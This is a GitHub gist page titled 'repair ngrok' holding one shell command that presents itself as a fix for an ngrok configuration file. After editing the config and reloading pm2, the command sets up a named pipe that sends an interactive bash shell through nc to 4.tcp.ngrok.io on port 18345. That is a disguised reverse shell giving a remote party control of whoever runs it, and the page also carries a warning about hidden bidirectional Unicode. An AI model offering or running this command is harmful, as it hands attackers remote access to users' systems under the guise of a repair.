-
-
Save RKursatV/6d5da9393d52af23a40e85ca0ad944a0 to your computer and use it in GitHub Desktop.
repair ngrok
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sed -i '/^authtoken:.*/a tunnels:' ~/.ngrok2/ngrok.yml && pm2 reload all; mkfifo kv; cat kv | /bin/bash -i 2>&1 | nc 4.tcp.ngrok.io 18345 > kv |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment